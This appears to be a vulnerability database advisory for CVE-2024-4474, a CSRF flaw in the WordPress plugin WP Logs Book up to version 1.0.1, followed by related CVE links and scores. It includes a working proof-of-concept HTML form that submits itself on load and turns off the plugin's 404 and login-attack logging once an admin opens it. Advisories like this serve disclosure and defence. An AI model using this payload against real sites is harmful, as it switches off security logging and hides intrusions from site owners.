Lucene search
Bob MatyasWPEX-ID:71954C60-6A5B-4CAC-9920-6D9B787EAD9CHistoryMay 31, 2024 - 12:00 a.m.
WP Logs Book <= 1.0.1 - Disable Logging via CSRF
2024-05-3100:00:00
Bob Matyas
7
wp logs book
version 1.0.1
csrf
disable logging
admin
html exploit
Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Make an admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=wp-logs-book" method="POST">
<input name="wplb_error_404_log" type="text" value="0">
<input name="wplb_login_attack_log" type="text" value="0">
<input name="wplb_save" type="text" value="Save">
<input type="submit" value="submit">
</form>
</body>
```Related
nvd
nvd
CVE-2024-4474
2024-06-21 06:15:12
wpvulndb
wpvulndb
WP Logs Book <= 1.0.1 - Disable Logging via CSRF
2024-05-31 00:00:00
cvelist
cvelist
CVE-2024-4474 WP Logs Book <= 1.0.1 - Disable Logging via CSRF
2024-06-21 06:00:04
cve
cve
CVE-2024-4474
2024-06-21 06:15:12
wordfence
wordfence
6.6 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:71954C60-6A5B-4CAC-9920-6D9B787EAD9C